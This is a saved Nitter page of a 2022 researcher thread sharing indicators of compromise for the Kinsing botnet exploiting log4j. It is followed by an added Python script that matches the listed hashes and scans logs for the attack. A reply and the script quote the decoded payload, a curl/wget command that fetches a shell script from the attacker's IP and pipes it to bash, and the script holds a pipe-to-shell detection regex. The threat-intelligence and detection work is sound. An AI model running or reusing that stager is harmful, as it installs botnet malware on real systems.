<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="stylesheet" type="text/css" href="/css/style.css?v=18" />
    <link rel="stylesheet" type="text/css" href="/css/fontello.css?v=2" />
    <link rel="stylesheet" type="text/css" href="/css/themes/nitter.css" />
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" />
    <link rel="manifest" href="/site.webmanifest" />
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#ff6c60" />
    <link rel="search" type="application/opensearchdescription+xml" title="nitter" href="https://nitter.net/opensearch" />
    <link rel="canonical" href="https://twitter.com/tolisec/status/1507854421618839564" />
    <title>Toli (@tolisec): &quot;#Kinsing botnet exploiting #log4j 
IoCs:
ldap&#x2F;web: 178[.]20[.]40[.]227
kinsing bin: https:&#x2F;&#x2F;bazaar.abuse.ch&#x2F;sample&#x2F;5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d&#x2F;
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a&quot; | nitter</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="theme-color" content="#1F1F1F" />
    <meta property="og:type" content="photo" />
    <meta property="og:title" content="Toli (@tolisec)" />
    <meta property="og:description" content="#Kinsing botnet exploiting #log4j 
IoCs:
ldap/web: 178[.]20[.]40[.]227
kinsing bin: https://bazaar.abuse.ch/sample/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a" />
    <meta property="og:site_name" content="Nitter" />
    <meta property="og:locale" content="en_US" />
    <link rel="preload" type="image/png" href="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dsmall" as="image" />
    <meta property="og:image" content="https://nitter.net/pic/media%2FFOz4KOpXIAAKulJ.jpg" />
    <meta property="twitter:image:src" content="https://nitter.net/pic/media%2FFOz4KOpXIAAKulJ.jpg" />
    <meta property="twitter:card" content="summary_large_image" />
    <link rel="preload" type="font/woff2" as="font" href="/fonts/fontello.woff2?21002321" crossorigin="anonymous" />
  </head>
  <body>
    <div class="container"><div class="conversation">
        <div class="main-thread"><div id="m" class="main-tweet"><div class="timeline-item "><div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/tolisec"><img class="avatar round" src="/pic/profile_images%2F1269377768313303040%2FgAV1Y9r__bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/tolisec" title="Toli">Toli</a>
                        <a class="username" href="/tolisec" title="@tolisec">@tolisec</a>
                      </div>
                      <span class="tweet-date"><a href="/tolisec/status/1507854421618839564#m" title="Mar 26, 2022 · 10:58 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto"><a href="/search?q=%23Kinsing">#Kinsing</a> botnet exploiting <a href="/search?q=%23log4j">#log4j</a> 
IoCs:
ldap/web: 178[.]20[.]40[.]227
kinsing bin: <a href="https://bazaar.abuse.ch/sample/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/">bazaar.abuse.ch/sample/5d253…</a>
curl-amd64:
6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3
libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a</div>
                <div class="attachments"><div class="gallery-row" style=""><div class="attachment image"><a class="still-image" href="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dorig" target="_blank"><img src="/pic/media%2FFOz4KOpXIAAKulJ.jpg%3Fname%3Dsmall" alt="" /></a></div></div></div>
                <p class="tweet-published">Mar 26, 2022 · 10:58 PM UTC</p>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 4</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 17</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 29</div></span>
                </div>
              </div></div></div></div>
        <div id="r" class="replies">
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/bad_packets/status/1507858899264688128#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/bad_packets"><img class="avatar round" src="/pic/profile_images%2F1113668754141900801%2FFGltMfZ1_bigger.png" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/bad_packets" title="Bad Packets">Bad Packets<div class="icon-container"><span class="icon-ok verified-icon" title="Verified account"></span></div></a>
                        <a class="username" href="/bad_packets" title="@bad_packets">@bad_packets</a>
                      </div>
                      <span class="tweet-date"><a href="/bad_packets/status/1507858899264688128#m" title="Mar 26, 2022 · 11:15 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">CVE-2021-44228 exploit activity detected from 178.20.40.227 (🇷🇺) starting at 2022-03-26T19:59:01Z – lighting up all our honeypots since then.

Payload decodes to:
(curl -s 178.20.40.227/lh.sh||wget -q -O- 178.20.40.227/lh.sh)|bash

Saved archive:
<a href="https://pastebin.com/XvADaVRF">pastebin.com/XvADaVRF</a></div>
                <div class="card"><a class="card-container" href="https://pastebin.com/XvADaVRF"><div class="card-content-container"><div class="card-content">
                        <h2 class="card-title">Saved archive of http:&#x2F;&#x2F;178.20.40.227&#x2F;lh.sh - Pastebin.com</h2>
                        <span class="card-destination">pastebin.com</span>
                      </div></div></a></div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 5</div></span>
                </div>
              </div>
            </div></div>
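A defender-side way to put the indicators in this thread to work, added here as an example and not code from any of the posters: it refangs the address from the first post, looks file hashes up against the three SHA256 values listed there, and scans log lines both for the address and for base64 blobs that decode to a download-then-pipe-to-shell command of the shape Bad Packets quoted. The log lines and file bytes are constructed for the demonstration; the function names and regular expressions are my own assumptions.

```python
"""Indicator matcher for the Kinsing / log4j IoCs posted in this thread.

Added example, not code from any of the thread's authors. Log lines and
file bytes below are constructed; function names and regexes are my own.
"""
import base64
import binascii
import hashlib
import re
from typing import Optional

# --- Indicators copied verbatim from the first post ---------------------
IOC_IP_DEFANGED = "178[.]20[.]40[.]227"
IOC_SHA256 = {
    "5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d": "kinsing bin",
    "6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3": "curl-amd64",
    "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a": "libsystem .so",
}
# Decoded stager quoted in the Bad Packets reply (used here only as a sample).
PAYLOAD = "(curl -s 178.20.40.227/lh.sh||wget -q -O- 178.20.40.227/lh.sh)|bash"


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('178[.]20[.]40[.]227', 'hxxp://') back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")


IOC_IP = refang(IOC_IP_DEFANGED)

# curl/wget ... | sh or bash: the shape of the decoded stager above.
DOWNLOAD_PIPE_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")
# Runs of base64 alphabet long enough to be worth decoding.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(line: str) -> list:
    """Return every base64 run in the line that decodes to printable ASCII."""
    out = []
    for m in B64_RUN_RE.finditer(line):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def scan_line(line: str) -> dict:
    """Check one log line, and anything base64 inside it, for the IoC address
    and for a download-then-pipe-to-shell command."""
    decoded = decode_b64_tokens(line)
    texts = [line] + decoded
    return {
        "ioc_ip": any(IOC_IP in t for t in texts),
        "pipe_to_shell": any(DOWNLOAD_PIPE_RE.search(t) is not None for t in texts),
        "decoded": decoded,
    }


def scan_log(lines) -> list:
    """Return (index, hits) for every line that matched something."""
    flagged = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits["ioc_ip"] or hits["pipe_to_shell"]:
            flagged.append((i, hits))
    return flagged


def label_for_sha256(hexdigest: str) -> Optional[str]:
    """Map a SHA256 to the label the thread gave it, or None."""
    return IOC_SHA256.get(hexdigest.lower())


def hash_matches(data: bytes) -> Optional[str]:
    """Hash file contents and look them up in the IoC table."""
    return label_for_sha256(hashlib.sha256(data).hexdigest())


# --- Constructed sample input (not real traffic) -------------------------
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Mar/2022:20:01:13 +0000] "GET /index.html HTTP/1.1" 200 512',
    # request from the IoC address itself
    '178.20.40.227 - - [26/Mar/2022:20:01:14 +0000] "GET / HTTP/1.1" 200 512',
    # a base64 blob in a query string that decodes to the quoted stager
    '10.0.0.9 - - [26/Mar/2022:20:01:15 +0000] "GET /?x='
    + base64.b64encode(PAYLOAD.encode()).decode()
    + ' HTTP/1.1" 404 0',
]
SAMPLE_FILE = b"#!/bin/sh\necho benign\n"  # constructed, should not match

if __name__ == "__main__":
    for i, hits in scan_log(SAMPLE_LOG):
        print(f"line {i}: ip={hits['ioc_ip']} pipe_to_shell={hits['pipe_to_shell']} decoded={hits['decoded']}")
    print("sample file:", hash_matches(SAMPLE_FILE))
```

The hash lookup is exact-match only, so it catches the three samples named in the thread and nothing else; the log scan is the broader net, since the piped-download pattern and the decoded-blob check do not depend on this particular address.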
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/ANeilan/status/1507866414631186433#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/ANeilan"><img class="avatar round" src="/pic/profile_images%2F1499210833787858948%2FVGKmM_Lb_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/ANeilan" title="Alan Neilan">Alan Neilan</a>
                        <a class="username" href="/ANeilan" title="@ANeilan">@ANeilan</a>
                      </div>
                      <span class="tweet-date"><a href="/ANeilan/status/1507866414631186433#m" title="Mar 26, 2022 · 11:45 PM UTC">Mar 26</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">The bitbucket profile:
/bitbucket.org/eosakk11/</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div></div>
          <div class="reply thread thread-line"><div class="timeline-item thread-last ">
              <a class="tweet-link" href="/Gi7w0rm/status/1508010943506169858#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/Gi7w0rm"><img class="avatar round" src="/pic/profile_images%2F1356195785453481984%2Fx0zEqJcg_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/Gi7w0rm" title="Gitworm">Gitworm</a>
                        <a class="username" href="/Gi7w0rm" title="@Gi7w0rm">@Gi7w0rm</a>
                      </div>
                      <span class="tweet-date"><a href="/Gi7w0rm/status/1508010943506169858#m" title="Mar 27, 2022 · 9:20 AM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto"><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing">malpedia.caad.fkie.fraunhofe…</a>

Just adding this in case anybody wonders :)</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 2</div></span>
                </div>
              </div>
            </div></div>
          <div class="reply thread thread-line">
            <div class="timeline-item ">
              <a class="tweet-link" href="/timb_machine/status/1508049489004744708#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/timb_machine"><img class="avatar round" src="/pic/profile_images%2F68168727%2F2007061702-debconf_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/timb_machine" title="Tim Brown">Tim Brown</a>
                        <a class="username" href="/timb_machine" title="@timb_machine">@timb_machine</a>
                      </div>
                      <span class="tweet-date"><a href="/timb_machine/status/1508049489004744708#m" title="Mar 27, 2022 · 11:53 AM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="replying-to">Replying to <a href="/tolisec">@tolisec</a> <a href="/Securityblog">@Securityblog</a> <a href="/ankit_anubhav">@ankit_anubhav</a> <a href="/0xrb">@0xrb</a> <a href="/malwrhunterteam">@malwrhunterteam</a></div>
                <div class="tweet-content media-body" dir="auto">Mm, Linux malware, my favourite.</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
            <div class="timeline-item ">
              <a class="tweet-link" href="/timb_machine/status/1508053745476804612#m"></a>
              <div class="tweet-body">
                <div><div class="tweet-header">
                    <a class="tweet-avatar" href="/timb_machine"><img class="avatar round" src="/pic/profile_images%2F68168727%2F2007061702-debconf_bigger.jpg" alt="" /></a>
                    <div class="tweet-name-row">
                      <div class="fullname-and-username">
                        <a class="fullname" href="/timb_machine" title="Tim Brown">Tim Brown</a>
                        <a class="username" href="/timb_machine" title="@timb_machine">@timb_machine</a>
                      </div>
                      <span class="tweet-date"><a href="/timb_machine/status/1508053745476804612#m" title="Mar 27, 2022 · 12:10 PM UTC">Mar 27</a></span>
                    </div>
                  </div></div>
                <div class="tweet-content media-body" dir="auto"><a href="/tolisec" title="Toli">@tolisec</a> You might enjoy the talks by <a href="/coolestcatiknow" title="Cat">@coolestcatiknow</a> and me at ATT&amp;CKCon - she's talking on what comes next for ATT&amp;CK for Linux and OS X and I'm covering a couple of real world examples of UNIX detection engineering</div>
                <div class="tweet-stats">
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-comment" title=""></span> 1</div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-retweet" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-quote" title=""></span></div></span>
                  <span class="tweet-stat"><div class="icon-container"><span class="icon-heart" title=""></span> 1</div></span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div></div>
  </body>
</html>